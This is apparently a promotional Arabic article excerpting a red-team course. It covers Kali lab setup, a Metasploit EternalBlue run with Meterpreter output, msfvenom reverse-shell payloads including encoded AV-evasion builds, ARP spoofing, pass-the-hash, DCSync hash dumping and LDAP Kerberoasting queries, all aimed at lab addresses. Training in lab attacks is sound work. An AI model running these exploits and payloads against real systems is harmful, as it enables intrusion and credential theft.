شرح بسيط لـ Network Security Red Team (مع مخططات وكود حقيقي)
Network Security Red Team : الأساسيات في مقال واحد — كود حقيقي، مخططات وخطوات ملموسة، مقتطفات من دورة مكونة من 39 درسًا.
دليل مباشر إلى الهدف: Network Security Red Team مفكك مع مخططات وأمثلة عملية وأوامر مجربة. كل شيء من دورة منظمة من 11 فصلاً — إليك الأفضل منها.
tl;dr
- تحضير مختبر الفريق الأحمر
- أساسيات أمن الشبكات
- الاستطلاع والتعداد الشبكي
- الاستغلال والوصول الأولي
- الحركة الجانبية والـ pivoting
~$ cat ./parcours.md # Network Security Red Team — 10 فصول
01
إعداد مختبر Red Team الخاص بك
→ عرض الدورة وأخلاقيات Red Team→ تثبيت Kali Linux والبنية التحتية للمختبر الافتراضي+ 1 دروس أخرى
02
أساسيات أمن الشبكات
→ نموذج OSI وTCP/IP من وجهة نظر الـ pentester→ البروتوكولات الحرجة لـ Red Team+ 1 دروس أخرى
03
الاستطلاع والتعداد الشبكي
→ OSINT والاستطلاع السلبي→ فحص Nmap المتقدم (NSE, timing, evasion)+ 2 دروس أخرى
04
الاستغلال والوصول الأولي
→ Metasploit Framework — وحدات استغلال الشبكة→ Metasploit Framework — وحدات استغلال الشبكة+ 2 دروس أخرى
05
الحركة الجانبية والـ pivoting
→ pivoting الشبكة — SSH, Chisel, Ligolo-ng→ Pass-the-Hash, Pass-the-Ticket و Over-Pass-the-Hash+ 2 دروس أخرى
06
تصعيد الامتيازات
→ تصعيد الامتيازات ويندوز — تجاوز UAC، انتحال الرمز، الخدمات→ PrivEsc لينكس — SUID, sudo, capabilities, kernel+ 1 دروس أخرى
07
الاستمرارية والباب الخلفي الشبكي
→ الاستمرارية ويندوز — الخدمات، السجل، المهام، WMI→ الاستمرارية لينكس — مفاتيح SSH، cron، systemd، eBPF+ 1 دروس أخرى
08
القيادة والسيطرة C2
→ بنية C2 — Sliver, Havoc وأطر العمل الحديثة→ Beaconing, sleep, jitter وملفات التشكيل القابلة للتشكيل+ 2 دروس أخرى
🏁
المشروع النهائي (+ 2 فصول في الطريق)
→ ستغادر بمشروع ملموس وقابل للعرض
تثبيت Kali Linux وبنية مختبر افتراضي
NOTE🎯 الأهداف التعليمية
في نهاية هذا الدرس ستكون قد: ثبتت هايبرفايزر (VirtualBox أو VMware)، ونشرت Kali Linux داخل آلة افتراضية معزولة بشكل صحيح، وهيأت شبكة host-only للمختبر، وتحققت من عمل أدوات Red Team الأساسية.
في نهاية هذا الدرس ستكون قد: ثبتت هايبرفايزر (VirtualBox أو VMware)، ونشرت Kali Linux داخل آلة افتراضية معزولة بشكل صحيح، وهيأت شبكة host-only للمختبر، وتحققت من عمل أدوات Red Team الأساسية.
1. المتطلبات المادية
💾 الحد الأدنى المقبول
⚡ مريح
🏆 مثالي
WARNING⚠️ التحقق من التvirtualization
تحت Windows:
تحت Windows:
systeminfo | findstr /i "Hyper-V" يجب أن يظهر « Yes » لـ Virtualization Enabled in Firmware. وإلا فعّل VT-x/AMD-V في البيوس/UEFI.2. اختيار الهايبرفايزر
| الهايبرفايزر | السعر | نظام المضيف | المزايا | العيوب |
|---|---|---|---|---|
| VirtualBox 7.x | مجاني (GPL) | Win, macOS, Linux | مفتوح المصدر، لقطات غير محدودة، متوافق مع GOAD | أداء متوسط على Windows 11 |
| VMware Workstation Pro | مجاني (منذ 2024) | Win, Linux | سريع جداً، NAT ممتاز | أكثر تعقيداً في الكتابة البرمجية |
| VMware Fusion Pro | مجاني (macOS) | macOS (Intel + Apple Silicon) | دعم ARM64 أصلي (M1/M2/M3) | قيود على Apple Silicon (لا يدعم Win x86) |
| Hyper-V | مضمن في Win Pro | Windows 10/11 Pro | أداء أصلي | لقطات محدودة، تعارض مع VBox |
| Proxmox VE | مجاني | Bare metal | مستوى إنتاجي، وحدة تحكم ويب | يتطلب خادماً مخصصاً |
TIP💡 توصية الدورة
VirtualBox للبساطة والنقل (Mac/Win/Linux)، أو VMware Workstation Pro للأداء. GOAD يدعم الاثنين أصلاً عبر Ansible.
VirtualBox للبساطة والنقل (Mac/Win/Linux)، أو VMware Workstation Pro للأداء. GOAD يدعم الاثنين أصلاً عبر Ansible.
3. تثبيت VirtualBox
تحت Windows
# تحميل من https://www.virtualbox.org/wiki/Downloads # الإصدار 7.0.x (مستقر) أو 7.1.x # تثبيت صامت عبر winget winget install -e --id Oracle.VirtualBox # التحقق من التثبيت VBoxManage --version # Doit afficher : 7.0.x ou 7.1.x # تثبيت Extension Pack (USB 3.0, RDP, disk encryption) # تحميل Oracle_VM_VirtualBox_Extension_Pack-7.x.vbox-extpack VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-*.vbox-extpack
تحت macOS (Intel)
# عبر Homebrew brew install --cask virtualbox brew install --cask virtualbox-extension-pack # الموافقة على الـ kext في تفضيلات النظام > الأمان # (يتطلب إعادة تشغيل)
تحت Linux (Ubuntu / Debian)
# إضافة مستودع Oracle
wget -O- https://www.virtualbox.org/download/oracle_vbox_2016.asc | \
sudo gpg --dearmor -o /usr/share/keyrings/oracle-virtualbox-2016.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/oracle-virtualbox-2016.gpg] \
https://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib" | \
sudo tee /etc/apt/sources.list.d/virtualbox.list
sudo apt update
sudo apt install -y virtualbox-7.0
# التحقق
VBoxManage --version4. تحميل Kali Linux
Kali Linux هي توزيعة مبنية على Debian مخصصة للأمن الهجومي. تحتوي أصلاً على أكثر من 600 أداة.
# الصفحة الرسمية : https://www.kali.org/get-kali/ # الخيار 1 : آلة VirtualBox جاهزة (موصى به) # الملف : kali-linux-2026.X-virtualbox-amd64.7z # الحجم : ~3 جيجابايت # الميزة: VBox Guest Additions مثبتة مسبقاً # الخيار 2 : ملف ISO للتثبيت # الملف : kali-linux-2026.X-installer-amd64.iso # الحجم : ~4 جيجابايت # الميزة: تحكم كامل في التثبيت # الخيار 3 : WSL (Windows Subsystem for Linux) # الميزة: تكامل مع Windows، خفيف # العيب: لا توجد قاعدة بيانات Metasploit مستمرة بسهولة # التحقق من السلامة (دائماً!) sha256sum kali-linux-2026.*-virtualbox-amd64.7z # مقارنة بالقيمة المنشورة على kali.org
WARNING⚠️ التحقق دائماً من SHA256
سبق أن وزعت مرايا ضارة صور Kali مصابة بأحصنة طروادة. تحقق دائماً من بصمة SHA256 مقابل المنشورة على الموقع الرسمي.
سبق أن وزعت مرايا ضارة صور Kali مصابة بأحصنة طروادة. تحقق دائماً من بصمة SHA256 مقابل المنشورة على الموقع الرسمي.
5. استيراد آلة Kali الجاهزة
# 1. فك ضغط الأرشيف
7z x kali-linux-2026.X-virtualbox-amd64.7z
# مشكلة في 7zip؟ ثبت: sudo apt install p7zip-full
# 2. الاستيراد في VirtualBox (الخيار أ: واجهة رسومية)
# File > Import Appliance > اختيار الملف .vbox
# 3. الاستيراد عبر سطر الأوامر (الخيار ب: سكريبت)
VBoxManage import kali-linux-2026.X-virtualbox-amd64/kali-linux-2026.X-virtualbox-amd64.vbox \
--vsys 0 --vmname "Kali-Red-Team" --cpus 4 --memory 6144
# 4. سرد الآلات الافتراضية
VBoxManage list vms
# Doit afficher : "Kali-Red-Team" {uuid}الإعدادات الموصى بها قبل الإقلاع الأول
VM="Kali-Red-Team" # تخصيص 4 وحدات معالجة و6 جيجابايت رام VBoxManage modifyvm "$VM" --cpus 4 --memory 6144 # تفعيل الحافظة المشتركة ثنائية الاتجاه VBoxManage modifyvm "$VM" --clipboard-mode bidirectional --draganddrop bidirectional # تفعيل تسريع الفيديو VBoxManage modifyvm "$VM" --vram 128 --graphicscontroller vmsvga --accelerate3d on # تعطيل USB 1.0 وتفعيل USB 3.0 VBoxManage modifyvm "$VM" --usb on --usbehci on --usbxhci on # توليد عنوان MAC ثابت (مفيد للقطات الشبكية) VBoxManage modifyvm "$VM" --macaddress1 080027AA1010
Metasploit Framework — وحدات استغلال الشبكة
NOTE🎯 الأهداف التعليمية
في نهاية هذا الدرس ستعرف كيفية التنقل داخل Metasploit Framework (msfconsole)، واختيار وحدات الاستغلال الشبكي المناسبة، واختيار الحمولة المناسبة، وتشغيل handler، والحصول على جلسة Meterpreter على هدف ضعيف في مختبرك.
في نهاية هذا الدرس ستعرف كيفية التنقل داخل Metasploit Framework (msfconsole)، واختيار وحدات الاستغلال الشبكي المناسبة، واختيار الحمولة المناسبة، وتشغيل handler، والحصول على جلسة Meterpreter على هدف ضعيف في مختبرك.
1. لماذا Metasploit؟
Metasploit Framework (MSF) هو إطار الاستغلال الأكثر استخداماً في العالم. يجمع أكثر من 2300 exploit و1500 payload و700 وحدة مساعدة و600 وحدة ما بعد الاستغلال.
✅ نقاط قوة Metasploit
⚠️ الحدود التي يجب معرفتها
TIP💡 متى تستخدم MSF؟
ممتاز لـ: الاختبار الاختراقي التعليمي، الثغرات الشبكية الكلاسيكية (SMB, RPC, RCE web)، الـ pivoting الأساسي. أقل ملاءمة لـ: عمليات Red Team الخفية الحديثة (يفضل Sliver, Mythic, Havoc).
ممتاز لـ: الاختبار الاختراقي التعليمي، الثغرات الشبكية الكلاسيكية (SMB, RPC, RCE web)، الـ pivoting الأساسي. أقل ملاءمة لـ: عمليات Red Team الخفية الحديثة (يفضل Sliver, Mythic, Havoc).
2. بنية Metasploit
/usr/share/metasploit-framework/ ├── modules/ │ ├── exploits/ # 2300+ exploits par OS / service │ ├── payloads/ # 1500+ payloads │ ├── auxiliary/ # Scanners, brute force, sniffers │ ├── post/ # Modules post-exploitation │ ├── encoders/ # Obfuscation payload (peu efficace AV) │ ├── nops/ # NOP sleds │ └── evasion/ # Modules anti-AV └── data/ # Wordlists, templates
فئات الوحدات
| النوع | الوصف | مثال |
|---|---|---|
| exploit | كود يستغل ثغرة | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | ماسحات، fuzzers، brute force، DoS | auxiliary/scanner/smb/smb_login |
| payload | الكود المرسل بعد الاستغلال (shell, meterpreter) | windows/x64/meterpreter/reverse_https |
| post | إجراءات بعد فتح الجلسة | post/windows/gather/hashdump |
| encoder | إخفاء الحمولة | x86/shikata_ga_nai |
| evasion | تجاوز AV/Defender | windows/windows_defender_exe |
3. الخطوات الأولى في msfconsole
# 1. تشغيل قاعدة PostgreSQL (عند الإقلاع) sudo systemctl start postgresql sudo msfdb init # une seule fois # 2. تشغيل msfconsole مع تفعيل القاعدة msfconsole -q msf6 > db_status # [*] Connected to msf. Connection type: postgresql. # 3. إنشاء workspace لكل مهمة (حاسم) msf6 > workspace -a mission_lab msf6 > workspace # * mission_lab <- l’étoile = workspace actif # 4. استيراد فحص Nmap msf6 > db_import /tmp/enriched.xml msf6 > hosts msf6 > services -p 445 # 5. البحث عن وحدة msf6 > search type:exploit eternalblue msf6 > search name:bluekeep platform:windows msf6 > search cve:2017-0144 # 6. المساعدة الكاملة msf6 > help msf6 > info exploit/windows/smb/ms17_010_eternalblue
4. تشريح exploit في Metasploit
# Séquence standard pour LANCER UN EXPLOIT msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(...) > show options msf6 exploit(...) > show targets msf6 exploit(...) > show payloads # Configurer les options OBLIGATOIRES (Required: yes) msf6 exploit(...) > set RHOSTS 192.168.56.20 msf6 exploit(...) > set RPORT 445 # Choisir un payload adapté msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_https msf6 exploit(...) > set LHOST 192.168.56.10 # votre Kali msf6 exploit(...) > set LPORT 8443 # Vérifier les options msf6 exploit(...) > show options # (Optionnel) vérifier que la cible est vulnérable msf6 exploit(...) > check # [+] 192.168.56.20:445 - The target is vulnerable. # Lancer ! msf6 exploit(...) > run # [*] Started HTTPS reverse handler on https://192.168.56.10:8443 # [*] Sending stage (203846 bytes) to 192.168.56.20 # [*] Meterpreter session 1 opened ... meterpreter >
5. اختيار الحمولة المناسبة
اصطلاحات التسمية
windows/x64/meterpreter/reverse_https ^^^^^^^^^^^ ^^^^^^^^^^^^ ^^^^^^^^^^^^^ | OS+arch | Type | Transport windows : Windows x64 : architecture 64 bits meterpreter : payload avancé (vs simple «shell») reverse_https : connexion sortante chiffrée vers attaquant
وسائط النقل الرئيسية
| الوسيط | الاتجاه | الخفاء | متى يُستخدم |
|---|---|---|---|
reverse_tcp | الهدف → المهاجم (منفذ مخصص) | ضعيف (حركة مشبوهة) | مختبر، منفذ صادر مفتوح |
reverse_https | الهدف → المهاجم (443 مشفر) | جيد (TLS شرعي) | شبكة مؤسسية قياسية |
reverse_http | الهدف → المهاجم (80) | متوسط (HTTP نصي) | إذا كان HTTPS محظوراً |
bind_tcp | المهاجم → الهدف (منفذ مخصص) | ضعيف (الهدف يستمع) | NAT عكسي، هدف مباشر |
reverse_dns | نفق عبر DNS | ممتاز (نادر) | شبكة مجزأة جداً |
reverse_winhttps | HTTPS عبر WinHTTP (cert pinning) | ممتاز | تجاوز بروكسي المؤسسة |
TIP💡 قاعدة سريعة
في المختبر:
في مهمة داخلية:
إذا كان هناك بروكسي مؤسسي:
في المختبر:
reverse_tcp على 4444 (سريع).في مهمة داخلية:
reverse_https على 443 (يمر عبر الجدران النارية/البروكسي).إذا كان هناك بروكسي مؤسسي:
reverse_winhttps الذي يحترم إعدادات النظام.6. Multi/handler — استقبال الجلسات بشكل مستقل
الوحدة multi/handler هي «مستقبل عام» يستمع للحمولات المولدة بشكل منفصل (باستخدام msfvenom).
msf6 > use multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set LHOST 192.168.56.10 msf6 exploit(multi/handler) > set LPORT 443 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > run -j # -j = job en arrière-plan # Voir les jobs actifs msf6 > jobs # Stopper un job msf6 > jobs -k 1
توليد حمولة باستخدام msfvenom
# EXE Windows
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f exe -o /tmp/payload.exe
# ELF Linux
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f elf -o /tmp/payload
# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f psh-cmd
# DLL injection
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f dll -o /tmp/payload.dll
# Shellcode خام (لـ custom loader)
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f raw -o /tmp/shellcode.bin
# مشفر (Shikata Ga Nai لتجاوز AV بسيط)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-e x64/xor_dynamic -i 10 \
-f exe -o /tmp/encoded.exeالبروتوكولات الحرجة لـ Red Team
NOTE🎯 الأهداف التعليمية
في نهاية هذا الدرس ستعرف آلية عمل ونقاط الضعف القابلة للاستغلال للبروتوكولات السبعة الأساسية في شبكة مؤسسية Windows: ARP, DNS, SMB, LDAP, Kerberos, RDP وWinRM. ستتمكن من التعرف عليها في Wireshark ومعرفة الهجمات التي يسمح بها كل منها.
في نهاية هذا الدرس ستعرف آلية عمل ونقاط الضعف القابلة للاستغلال للبروتوكولات السبعة الأساسية في شبكة مؤسسية Windows: ARP, DNS, SMB, LDAP, Kerberos, RDP وWinRM. ستتمكن من التعرف عليها في Wireshark ومعرفة الهجمات التي يسمح بها كل منها.
1. ARP — الحلقة الأولى الضعيفة
ARP (Address Resolution Protocol) يترجم IP إلى MAC على الشبكة المحلية. بدون مصادقة، هو الهدف رقم 1 على الشبكة الداخلية.
# عرض ذاكرة ARP المحلية ip neigh show # ou arp -an # تسميم ذاكرة هدف (في المختبر) bettercap -iface eth1 > set arp.spoof.targets 192.168.56.20 > set arp.spoof.fullduplex true > arp.spoof on > net.sniff on # عرض الحركة المعترضة في Wireshark sudo wireshark -i eth1
نقاط ضعف ARP القابلة للاستغلال
TIP💡 التخفيف
DAI (Dynamic ARP Inspection) على مفاتيح Cisco/HP، 802.1X، ARP ثابت للبوابة الحرجة، أو ببساطة التشفير من طرف لطرف (TLS, VPN) الذي يجعل الاعتراض غير ضار.
DAI (Dynamic ARP Inspection) على مفاتيح Cisco/HP، 802.1X، ARP ثابت للبوابة الحرجة، أو ببساطة التشفير من طرف لطرف (TLS, VPN) الذي يجعل الاعتراض غير ضار.
2. DNS — الدليل الذي يتحدث كثيراً
DNS يُستخدم ليس فقط لحل الأسماء، بل يكشف أيضاً طوبولوجيا Active Directory عبر سجلات SRV.
# العثور على DC للنطاق عبر DNS
dig _ldap._tcp.dc._msdcs.lab.local SRV
dig _kerberos._tcp.lab.local SRV
dig _gc._tcp.lab.local SRV # Global Catalog
# العثور على كل الأجهزة في النطاق (Zone Transfer إن سمح)
dig @192.168.56.10 lab.local AXFR
# Reverse DNS على /24
for ip in 192.168.56.{1..254}; do
host $ip 2>/dev/null | grep -v NXDOMAIN
done
# DNS ديناميكي: تسجيل اسم مزيف (إن سمح في المختبر)
nsupdate -k /tmp/key.conf <<EOF
server 192.168.56.10
update add evil.lab.local 60 A 192.168.56.99
send
EOFهجمات DNS لـ Red Team
| الهجوم | الوصف | الأدوات |
|---|---|---|
| Zone transfer (AXFR) | إن سمح، تفريغ كامل للمنطقة | dig, dnsenum |
| DNS cache poisoning | تسميم ذاكرة المحلل | dnspoof, mitm6 |
| DNS subdomain enum | اكتشاف النطاقات الفرعية (استطلاع خارجي) | amass, subfinder, sublist3r |
| DNS tunneling C2 | تصدير/تحكم عبر استعلامات DNS | iodine, dnscat2 |
| NS records hijack | السيطرة على NS مهمل | nsec3walker |
3. SMB — السكين السويسرية لـ Red Team
SMB (Server Message Block) = مشاركة الملفات والطابعات، التنفيذ البعيد، نقل RPC. إنه البروتوكول الهجومي لـ Windows.
# تعداد: الإصدار، النظام، المشاركات، المستخدمين crackmapexec smb 192.168.56.0/24 crackmapexec smb 192.168.56.10 -u jon.snow -p 'Winter2026!' --shares crackmapexec smb 192.168.56.10 -u '' -p '' --users # Null session # سرد المشاركات باستخدام smbclient smbclient -L //192.168.56.10/ -U jon.snow%'Winter2026!' # الاتصال بمشاركة smbclient //192.168.56.10/Public -U jon.snow%'Winter2026!' smb: \> ls smb: \> get fichier_secret.txt # تثبيت المشاركة sudo mount -t cifs //192.168.56.10/Public /mnt/smb \ -o username=jon.snow,password='Winter2026!',vers=3.0
الهجمات البارزة على SMB
🏭 قبل المصادقة (بدون بيانات اعتماد)
🔐 بعد المصادقة (مع بيانات اعتماد)
# اختبار مضيف لـ EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 192.168.56.0/24
# استغلال Metasploit (في المختبر فقط)
msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.20
msf6 > run
# حركة جانبية PSExec باستخدام هاش NT (Pass-the-Hash)
impacket-psexec -hashes :32ED87BDB5FDC5E9CBA88547376818D4 \
administrator@192.168.56.10
# تفريغ الهاشات (DCSync، يتطلب صلاحيات DA)
impacket-secretsdump lab.local/administrator:'Pass!'@192.168.56.10 -just-dc4. LDAP — الدليل الشفاف
LDAP (المنفذ 389/636) يكشف كل دليل AD: المستخدمين، المجموعات، GPO، OU، ACL. مصادقة نطاق بسيطة تكفي عادة للاستعلام.
# البحث عن المستخدمين ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" -s sub "(&(objectClass=user)(objectCategory=person))" \ sAMAccountName description # البحث عن الحسابات القابلة لـ Kerberoast (مع SPN) ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" "(&(samAccountType=805306368)(servicePrincipalName=*))" \ sAMAccountName servicePrincipalName # البحث عن الحسابات القابلة لـ AS-REP roast ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" # البحث عن المخطط (كل الفئات) ldapsearch -x -H ldap://192.168.56.10 -b "CN=Schema,CN=Configuration,DC=lab,DC=local" cn
BloodHound: LDAP في رسم بياني
# جمع كامل من Kali
bloodhound-python -u jon.snow -p 'Winter2026!' -d lab.local \
-ns 192.168.56.10 -c All --zip
# تشغيل Neo4j وواجهة BloodHound
sudo neo4j start
bloodhound
# سحب وإفلات الملف .zip في الواجهة
# استعلام: Shortest path to Domain Admins
# استعلام: Find Kerberoastable Usersva-plus-loin
يغطي هذا المقال أكثر المقتطفات فائدة — الدورة الكاملة Network Security Red Team (11 فصلاً، 39 درساً، تمارين مصححة ومشروع نهائي) تأخذك حتى النهاية.
./acceder-au-cours-complet cours gratuit : Maîtriser Claude Codeالأسئلة الشائعة
كم من الوقت يستغرق تعلم Network Security Red Team؟
مع تقدم منظم (11 فصلاً، 39 درساً قصيراً وعملياً)، يمكن الوصول إلى مستوى تشغيلي في بضعة أسابيع بمعدل 30 إلى 60 دقيقة يومياً. المهم هو تطبيق كل مفهوم فوراً.
هل هناك متطلبات مسبقة؟
يفضل أن تكون مرتاحاً مع أساسيات المجال: هذا المحتوى يتعمق، مع حالات حقيقية.
من أين نبدأ عملياً؟
أعد تنفيذ أوامر هذا المقال، ثم تابع الدورة الكاملة Network Security Red Team: تربط الـ 39 درساً بالترتيب، مع تمارين ومشروع نهائي.
./a-lire-aussi
→ ابدأ بـ Ethical Hacking Fundamentals: خطوتك العملية الأولى اليوم→ Penetration Testing Avancé عملياً: الكود والأوامر التي تهم حقاً→ Web Application Security: الخطوات التسع الرئيسية للانتقال من الصفر إلى التشغيل📬 هل تريد تلقي هذا النوع من الأدلة كل أسبوع؟ اشترك مجاناً — كود حقيقي، بدون كلام فارغ.